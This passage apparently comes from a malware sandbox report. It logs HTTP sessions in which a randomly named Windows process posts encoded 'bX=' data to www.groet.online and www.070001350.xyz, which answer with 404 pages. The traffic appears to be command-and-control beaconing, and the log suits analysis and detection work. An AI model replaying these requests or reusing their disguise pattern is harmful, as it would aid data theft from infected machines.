                              Data Ascii: ;}Bf&0VUT&3,&fq_Bfpa,-QKmXff`yzPzp]2(dzIxhv0zt)+jf%StD{(y/drgP[P]'Z9}dYl7?V!Y75x/Er#@R%q"u *<SPFSW


                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                              43          192.168.2.5  54914        185.104.29.12    80                728  C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp                             Bytes transferred  Direction  Data
                              Sep 16, 2024 09:32:39.143508911 CEST  1761               OUT        POST /kdsf/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.groet.online
                              Origin: http://www.groet.online
                              Referer: http://www.groet.online/kdsf/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 72 70 6e 37 55 4f 58 4b 49 4e 42 5a 56 69 53 52 66 5a 30 78 58 37 63 78 71 34 62 52 63 7a 70 51 79 6e 43 2f 30 77 51 58 4e 76 70 79 6d 68 46 31 6e 74 49 7a 69 2f 4e 35 53 4e 70 79 50 34 2f 6e 49 41 34 59 46 46 4b 56 4e 7a 6e 72 58 54 79 34 65 75 76 6a 48 62 31 42 36 30 67 43 77 76 42 53 74 32 2f 57 73 71 51 31 43 2b 4a 7a 71 33 6b 6b 4f 70 6e 58 56 7a 5a 79 71 62 58 4b 2b 39 39 4c 52 55 49 39 55 61 49 4e 5a 45 77 75 2f 7a 51 54 57 6c 62 4e 4b 4e 76 55 65 30 39 54 50 70 71 2b 4b 55 68 48 4a 78 47 74 4b 67 68 78 34 6e 76 69 6d 47 4c 76 2b 72 46 34 58 6e 64 70 65 6b 6b 35 62 35 46 69 39 4a 37 7a 75 57 63 6b 46 35 61 57 37 57 6a 46 68 61 65 7a 6b 77 7a 46 31 6b 4f 33 55 45 51 48 7a 4a 70 4a 4b 5a 63 51 5a 57 76 67 59 48 55 2b 52 50 4a 5a 4a 4a 74 53 4d 61 78 76 56 57 54 32 45 4f 36 4f 32 35 4b 6f 62 36 32 34 43 73 38 77 32 4e 77 67 65 34 47 41 65 62 5a 30 68 32 68 2b 31 69 79 64 77 79 6f 61 6a 65 53 36 74 68 6a 4c 50 4b 66 53 76 5a 51 49 4b 57 59 72 66 6f 53 58 5a 6e 78 43 73 75 37 54 35 34 34 [TRUNCATED]
                              Data Ascii: bX= [TRUNCATED]
                              Sep 16, 2024 09:32:40.085836887 CEST  1236               IN         HTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:39 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              access-control-allow-origin: http://www.groet.online
                              access-control-allow-credentials: true
                              access-control-expose-headers: true
                              x-drupal-dynamic-cache: UNCACHEABLE
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-encoding: gzip
                              content-length: 4175
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 [TRUNCATED]
                              Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
                              Sep 16, 2024 09:32:40.085858107 CEST  1236               IN         Data Raw: 0d d9 76 42 23 25 5c f8 4c 3c 46 a1 1d e8 63 c6 64 aa 1b 54 fc 0c 3f d6 6d f8 a1 ff 62 a7 ff dd d8 bb b8 7f d7 0c fa 93 ef bf bf b4 7b 2e fe e1 78 d2 b4 4f 6f ee 69 e3 78 60 8f df a0 76 8d c1 ff de c4 76 80 3a f5 af 90 33 fd 86 4b 67 c8 e8 ed 60
                              Data Ascii: vB#%\L<FcdT?mb{.xOoix`vv:3Kg`W6t".vh27wyE/>^^oy{{:x3L>7}:3,8u+x?N'0io;w[}yo//QKaJKe
                              Sep 16, 2024 09:32:40.085870028 CEST  448                IN         Data Raw: 1e bf 16 f0 ba eb 99 98 c7 b7 03 cb 63 b3 30 e1 61 3b b1 83 cb cf 12 32 0c 3c 0d 60 92 cb b9 bc 78 c5 73 39 69 c9 10 7d e4 1b 8b e9 5a 65 1a 86 4c 5e 98 a8 06 9f 12 01 13 7c 89 f0 2c 12 ea 2b 2a 05 8d 70 87 75 fe 14 17 f3 48 68 c4 dd 79 2d bc c6
                              Data Ascii: c0a;2<`xs9i}ZeL^|,+*puHhy-3DJ#{.m )Ar;6I i2;wJiGN`8)K6[h%<7L4w[u(`j\k`(ly6s:06oSGt22iY
                              Sep 16, 2024 09:32:40.085875988 CEST  1236               IN         Data Raw: 82 39 5a 4e ca 9a 62 2e 15 9d c6 e8 6c 49 1c ca da 58 fc ea e1 db 93 cf b9 af 15 f9 cf 65 7b cc f2 a1 c9 98 9d 28 17 b0 07 1c df 3a b7 b5 95 e8 cb 91 01 61 01 1d b9 f8 f7 1c fe 97 13 fb 2e a2 39 12 08 17 dd 80 82 8d 68 c2 c1 79 66 36 3e 9b c0 1a
                              Data Ascii: 9ZNb.lIXe{(:a.9hyf6>_n^J;z;9LlKk[CCm3uE(rn5J>7G7r9eBX)GSS~z8mDV(VXoeWir"SYM>"M8,S^YHM)u%
                              Sep 16, 2024 09:32:40.085884094 CEST  680                IN         Data Raw: b7 5f ae 4f 96 cf 77 46 a5 95 12 a7 7c 24 bb 52 ff fe 82 6e 1f eb eb d3 52 82 97 5c 3b 31 6f 58 b8 cd e6 24 44 8f d9 2e e2 d3 11 2b 5d 49 25 8f cd 2a c2 b6 1e 5e 44 32 a0 17 4d ad b2 ce ac 46 3c 46 01 03 94 c1 67 ee 75 64 6e 69 63 5d 51 cf 6a c4
                              Data Ascii: _OwF|$RnR\;1oX$D.+]I%*^D2MF<Fgudnic]QjmQT}@V,C&,b|]KUmA+Pt<3\+4gk#3bd\MnhBGI|L5LHt jJ>=PovEG


                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                              44          192.168.2.5  54915        185.104.29.12    80                728  C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp                             Bytes transferred  Direction  Data
                              Sep 16, 2024 09:32:41.683321953 CEST  462                OUT        GET /kdsf/?bX=mrPbX6f2ANh6eH6BaYBcOaExirfKelxT8B/s11FteNVWpCBC/Ng1kYBANMlCHLb8Vm1KElmPNEHDJkuYfrXhfpk22msKwfJUhUP/5Z9IMLZY9GQtDtvdXiZeiMyh2YwcFA==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.groet.online
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:32:42.501647949 CEST  1236               IN         HTTP/1.1 404 Not Found
                              date: Mon, 16 Sep 2024 07:32:42 GMT
                              x-powered-by: PHP/8.3.8
                              cache-control: must-revalidate, no-cache, private
                              x-drupal-dynamic-cache: HIT
                              content-language: en
                              x-content-type-options: nosniff
                              x-frame-options: SAMEORIGIN
                              expires: Sun, 19 Nov 1978 05:00:00 GMT
                              x-generator: Drupal 10 (https://www.drupal.org)
                              x-drupal-cache: MISS
                              vary: Origin,Accept-Encoding,User-Agent
                              upgrade: h2,h2c
                              connection: Upgrade
                              content-length: 24869
                              content-type: text/html; charset=UTF-8
                              server: Apache
                              Data Raw: 0a 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 44 45 42 55 47 20 2d 2d 3e 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 48 4f 4f 4b 3a 20 27 68 74 6d 6c 27 20 2d 2d 3e 0a 3c 21 2d 2d 20 46 49 4c 45 20 4e 41 4d 45 20 53 55 47 47 45 53 54 49 4f 4e 53 3a 0a 20 20 20 e2 96 aa ef b8 8f 20 68 74 6d 6c 2d 2d 6b 64 73 66 2e 68 74 6d 6c 2e 74 77 69 67 0a 20 20 20 e2 9c 85 20 68 74 6d 6c 2e 68 74 6d 6c 2e 74 77 69 67 0a 2d 2d 3e 0a 3c 21 2d 2d 20 f0 9f 92 a1 20 42 45 47 49 4e 20 43 55 53 54 4f 4d 20 54 45 4d 50 4c 41 54 45 20 4f 55 54 50 55 54 20 66 72 6f 6d 20 27 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 61 79 6f 75 74 2f 68 74 6d 6c 2e 68 74 6d 6c 2e 74 77 69 67 27 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 73 74 79 6c 65 3d 22 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 68 75 65 3a 32 30 32 3b 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 73 61 74 75 72 61 74 69 6f [TRUNCATED]
                              Data Ascii: ... THEME DEBUG -->... THEME HOOK: 'html' -->... FILE NAME SUGGESTIONS: html--kdsf.html.twig html.html.twig-->... BEGIN CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/templates/layout/html.html.twig' --><!DOCTYPE html><html lang="en" dir="ltr" style="--color--primary-hue:202;--color--primary-saturation:79%;--color--primary-lightness:50"> <head> <meta charset="utf-8" /><meta name="Generator" content="Drupal 10 (https://www.drupal.org)" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="icon" href="/core/themes/olivero/favicon.ico" type
                              Sep 16, 2024 09:32:42.501672029 CEST  1236               IN         Data Raw: 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 47 72 6f 65 74 2e 4f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20
                              Data Ascii: ="image/vnd.microsoft.icon" /> <title>Page not found | Groet.Online</title> <link rel="stylesheet" media="all" href="/sites/default/files/css/css_q0l-YMB5MRfoTzN2tMgVVUlEneWGg2lLvzs1GSlfJa8.css?delta=0&amp;language=en&amp;theme=oliver
                              Sep 16, 2024 09:32:42.501725912 CEST | 1236 | IN | Data Raw: 73 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 6e 61 76 69 67 61 74 69 6f 6e 2f 6e 61 76 2d 70 72 69 6d 61 72 79 2d 6e 6f 2d 6a 73 2e 63 73 73 3f 73 6a 76 32 30 74 22 20 2f 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c
                              Data Ascii: s/components/navigation/nav-primary-no-js.css?sjv20t" /></noscript> </head> <body class="path-kdsf"> <a href="#main-content" class="visually-hidden focusable skip-link"> Skip to main content </a> ... THEME DE
                              Sep 16, 2024 09:32:42.501739025 CEST | 672 | IN | Data Raw: 64 65 72 22 20 61 72 69 61 2d 63 68 65 63 6b 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 69 63 6b 79 2d 68 65 61 64 65 72 2d 74 6f 67 67 6c 65 5f 5f 69 63 6f 6e 22 3e
                              Data Ascii: der" aria-checked="false"> <span class="sticky-header-toggle__icon"> <span></span> <span></span> <span></span> </span> </button> </div>
                              Sep 16, 2024 09:32:42.501784086 CEST | 1236 | IN | Data Raw: 65 72 2e 68 74 6d 6c 2e 74 77 69 67 27 20 2d 2d 3e 0a 0a 0a 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 44 45 42 55 47 20 2d 2d 3e 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 48 4f 4f 4b 3a 20 27 62 6c 6f 63 6b 27 20 2d 2d 3e 0a 3c 21 2d 2d 20 46 49 4c 45 20 4e
                              Data Ascii: er.html.twig' -->... THEME DEBUG -->... THEME HOOK: 'block' -->... FILE NAME SUGGESTIONS: block--header--id--olivero-site-branding.html.twig block--header--plugin-id--system-branding-block.html.twig block
                              Sep 16, 2024 09:32:42.501799107 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 62 75 74 74 6f 6e 73 22 20 64 61 74 61 2d 64 72 75 70 61 6c 2d 73 65 6c 65 63 74 6f 72 3d 22 6d 6f 62 69 6c 65 2d 62 75 74 74 6f 6e 73 22 3e 0a 20 20 20 20 20 20
                              Data Ascii: <div class="mobile-buttons" data-drupal-selector="mobile-buttons"> <button class="mobile-nav-button" data-drupal-selector="mobile-nav-button" aria-label="Main Menu" aria-controls="header-nav" aria-expanded="false">
                              Sep 16, 2024 09:32:42.501812935 CEST | 448 | IN | Data Raw: f0 9f 92 a1 20 42 45 47 49 4e 20 43 55 53 54 4f 4d 20 54 45 4d 50 4c 41 54 45 20 4f 55 54 50 55 54 20 66 72 6f 6d 20 27 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 74 65 6d 70 6c 61 74 65 73 2f 62 6c 6f 63 6b 2f 62 6c 6f 63 6b 2d
                              Data Ascii: BEGIN CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/templates/block/block--primary-menu--plugin-id--search-form-block.html.twig' --><div class="search-block-form block block-search-narrow" data-drupal-selector="search-block-form" id="
                              Sep 16, 2024 09:32:42.501823902 CEST | 1236 | IN | Data Raw: 2e 74 77 69 67 0a 20 20 20 e2 96 aa ef b8 8f 20 66 6f 72 6d 2e 68 74 6d 6c 2e 74 77 69 67 0a 2d 2d 3e 0a 3c 21 2d 2d 20 f0 9f 92 a1 20 42 45 47 49 4e 20 43 55 53 54 4f 4d 20 54 45 4d 50 4c 41 54 45 20 4f 55 54 50 55 54 20 66 72 6f 6d 20 27 63 6f
                              Data Ascii: .twig form.html.twig-->... BEGIN CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/templates/form--search-block-form.html.twig' --><form action="/search/node" method="get" id="search-block-form" accept-charset="UTF-8" class="
                              Sep 16, 2024 09:32:42.501836061 CEST | 1236 | IN | Data Raw: 79 73 22 20 6e 61 6d 65 3d 22 6b 65 79 73 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 31 35 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 31 32 38 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 73 65 61 72 63 68 20 66 6f 72 6d 2d 65 6c 65 6d 65 6e 74
                              Data Ascii: ys" name="keys" value="" size="15" maxlength="128" class="form-search form-element form-element--type-search form-element--api-search" />... END OUTPUT from 'core/modules/system/templates/input.html.twig' --> </div>... END OUTP
                              Sep 16, 2024 09:32:42.501847982 CEST | 1236 | IN | Data Raw: 20 66 72 6f 6d 20 27 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 74 65 6d 70 6c 61 74 65 73 2f 66 6f 72 6d 2f 69 6e 70 75 74 2d 2d 73 75 62 6d 69 74 2d 2d 68 65 61 64 65 72 2d 73 65 61 72 63 68 2e 68 74 6d 6c 2e 74 77 69 67 27 20
                              Data Ascii: from 'core/themes/olivero/templates/form/input--submit--header-search.html.twig' --></div>... END OUTPUT from 'core/modules/system/templates/container.html.twig' --></form>... END CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/te
                              Sep 16, 2024 09:32:42.508018017 CEST | 1236 | IN | Data Raw: 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 20 69 64 3d 22 62 6c 6f 63 6b 2d 6f 6c 69 76 65 72 6f 2d 6d 61 69 6e 2d 6d 65 6e 75 2d 6d 65 6e 75 22 3e 4d 61 69 6e 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 68 32 3e 0a 20 20 0a 20 20 20 20 20 20 20 20 0a 0a
                              Data Ascii: block__title" id="block-olivero-main-menu-menu">Main navigation</h2> ... THEME DEBUG -->... THEME HOOK: 'menu__main' -->... FILE NAME SUGGESTIONS: menu--main.html.twig menu--primary-menu.html.twig m


                              Session ID 45 | Source IP 192.168.2.5 | Source Port 54916 | Destination IP 65.21.196.90 | Destination Port 80 | PID 728 | Process C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:47.723521948 CEST | 727 | OUT | POST /ivyl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.070001350.xyz
                              Origin: http://www.070001350.xyz
                              Referer: http://www.070001350.xyz/ivyl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 31 34 54 32 31 65 32 45 48 2b 2b 78 32 6a 43 65 49 31 65 48 49 67 76 48 5a 43 4e 63 7a 78 71 47 63 66 67 62 6f 34 44 6f 68 38 53 44 66 33 74 72 59 32 55 78 65 43 71 39 42 75 69 2b 37 53 33 51 37 49 72 48 38 74 77 57 71 43 69 5a 6a 30 4f 79 32 41 74 54 34 59 58 31 45 56 42 73 66 6e 2b 58 30 6e 39 49 4d 6e 68 4e 52 66 78 6d 69 4f 66 6b 4e 52 46 36 69 51 34 36 4f 6d 48 76 37 74 6a 67 30 39 56 59 72 62 35 48 41 36 57 67 6d 70 53 62 32 46 4f 66 4b 35 68 35 51 37 58 4e 2b 4a 61 4b 39 76 53 59 59 39 52 79 42 36 32 75 2b 72 78 4d 57 31 30 65 58 54 4a 30 67 53 71 32 69 68 77 37 2f 6d 36 41 31 49 3d
                              Data Ascii: bX=c14T21e2EH++x2jCeI1eHIgvHZCNczxqGcfgbo4Doh8SDf3trY2UxeCq9Bui+7S3Q7IrH8twWqCiZj0Oy2AtT4YX1EVBsfn+X0n9IMnhNRfxmiOfkNRF6iQ46OmHv7tjg09VYrb5HA6WgmpSb2FOfK5h5Q7XN+JaK9vSYY9RyB62u+rxMW10eXTJ0gSq2ihw7/m6A1I=
                              Sep 16, 2024 09:32:48.381959915 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:32:48 GMT
                              vary: User-Agent
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session ID 46 | Source IP 192.168.2.5 | Source Port 54917 | Destination IP 65.21.196.90 | Destination Port 80 | PID 728 | Process C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:50.265780926 CEST | 747 | OUT | POST /ivyl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.070001350.xyz
                              Origin: http://www.070001350.xyz
                              Referer: http://www.070001350.xyz/ivyl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 31 34 54 32 31 65 32 45 48 2b 2b 77 58 7a 43 53 4c 74 65 51 34 67 75 43 5a 43 4e 53 54 78 75 47 63 54 67 62 70 38 31 6f 53 55 53 43 2b 48 74 71 63 69 55 77 65 43 71 70 52 75 37 78 62 53 73 51 37 4d 6a 48 35 46 77 57 71 57 69 5a 6d 59 4f 79 46 59 75 63 49 59 52 7a 45 56 48 7a 50 6e 2b 58 30 6e 39 49 4d 44 62 4e 56 37 78 6d 53 2b 66 32 63 52 4b 77 43 51 37 75 65 6d 48 72 37 74 6e 67 30 38 6c 59 70 2f 66 48 43 79 57 67 6e 5a 53 62 6e 46 50 4d 71 34 71 6e 51 36 57 43 4d 34 6c 46 38 2f 6b 62 65 67 6f 69 48 4f 43 6d 6f 47 62 57 30 39 63 4e 33 2f 78 6b 7a 61 64 6e 53 41 5a 68 63 32 4b 65 69 66 47 69 53 59 62 39 65 51 35 74 54 4b 39 4f 63 44 54 45 74 31 44
                              Data Ascii: bX=c14T21e2EH++wXzCSLteQ4guCZCNSTxuGcTgbp81oSUSC+HtqciUweCqpRu7xbSsQ7MjH5FwWqWiZmYOyFYucIYRzEVHzPn+X0n9IMDbNV7xmS+f2cRKwCQ7uemHr7tng08lYp/fHCyWgnZSbnFPMq4qnQ6WCM4lF8/kbegoiHOCmoGbW09cN3/xkzadnSAZhc2KeifGiSYb9eQ5tTK9OcDTEt1D
                              Sep 16, 2024 09:32:50.929989100 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:32:50 GMT
                              vary: User-Agent
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session ID 47 | Source IP 192.168.2.5 | Source Port 54918 | Destination IP 65.21.196.90 | Destination Port 80 | PID 728 | Process C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 16, 2024 09:32:52.817351103 CEST | 1764 | OUT | POST /ivyl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.070001350.xyz
                              Origin: http://www.070001350.xyz
